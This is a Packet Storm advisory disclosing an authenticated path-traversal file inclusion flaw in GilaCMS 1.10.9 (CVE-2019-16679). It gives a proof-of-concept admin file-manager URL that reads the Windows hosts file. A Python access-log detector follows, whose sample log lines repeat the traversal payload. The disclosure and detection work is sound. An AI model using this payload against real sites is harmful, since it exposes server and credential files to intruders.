Source: packetstorm
Author: Sainadh Jamalpur
ID: PACKETSTORM:154578
Published: Sep 23, 2019 - 12:00 a.m.

Gila CMS Local File Inclusion

2019-09-23 00:00:00
Sainadh Jamalpur
packetstormsecurity.com
EPSS: 0.007 (Low)

Percentile: 81.1%

`# Exploit Title: Authenticated Local File Inclusion(LFI) in GilaCMS  
# Google Dork: N/A  
# Date: 04-08-2019  
# Exploit Author: Sainadh Jamalpur  
# Vendor Homepage: https://github.com/GilaCMS/gila  
# Software Link: https://github.com/GilaCMS/gila  
# Version: 1.10.9  
# Tested on: XAMPP version 3.2.2 in Windows 10 64bit,  
# CVE : CVE-2019-16679  
  
*********** *Steps to reproduce the Vulnerability* *************  
  
Log in to the application as an admin user or equivalent user and go to the  
link below  
  
http://localhost/gilacms/admin/fm/?f=src../../../../../../../../../WINDOWS/system32/drivers/etc/hosts  
  
################################################################  
`
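
For defenders, one way to look for this request pattern in web server access logs, as an added example that is not part of the original advisory. It assumes combined-log-format lines and the `/admin/fm/` endpoint and `f` parameter shown in the URL above; the log lines, addresses and file names are constructed, and the check generalizes to percent-encoded and absolute-path variants.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
FM_ENDPOINT_RE = re.compile(r"/admin/fm/?$")  # endpoint from the advisory URL


def escapes_base(f_value):
    """Return True if f_value would resolve above its starting directory."""
    prev = None
    while prev != f_value:  # undo nested percent-encoding (%252e%252e ...)
        prev, f_value = f_value, unquote(f_value)
    path = f_value.replace("\\", "/")
    if path.startswith("/") or re.match(r"[A-Za-z]:", path):
        return True  # absolute path or Windows drive letter
    depth = 0
    for segment in path.split("/"):
        if segment in ("", "."):
            continue
        depth += -1 if segment == ".." else 1
        if depth < 0:  # climbed above the directory the path started in
            return True
    return False


def flag_requests(log_lines):
    """Return (line_number, decoded f value) for suspicious file-manager hits."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not FM_ENDPOINT_RE.search(url.path):
            continue
        for value in parse_qs(url.query).get("f", []):
            if escapes_base(value):
                hits.append((number, value))
    return hits


# Constructed sample log lines; 192.0.2.0/24 is a documentation address range.
SAMPLE_LOG = [
    '192.0.2.10 - - [23/Sep/2019:10:00:01 +0000] "GET /gilacms/admin/fm/?f=src/example/file.txt HTTP/1.1" 200 512',
    '192.0.2.10 - - [23/Sep/2019:10:00:07 +0000] "GET /gilacms/admin/fm/?f=src../../../../../../../../../WINDOWS/system32/drivers/etc/hosts HTTP/1.1" 200 824',
    '192.0.2.44 - - [23/Sep/2019:10:02:13 +0000] "GET /gilacms/admin/fm/?f=src%2F..%2F..%2Fexample.txt HTTP/1.1" 200 301',
    '192.0.2.44 - - [23/Sep/2019:10:02:20 +0000] "GET /gilacms/blog/?f=../x HTTP/1.1" 404 0',
]
```

Calling `flag_requests(SAMPLE_LOG)` returns the second and third lines; the same `escapes_base` logic can serve as a server-side allow check before a file manager opens the requested path.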
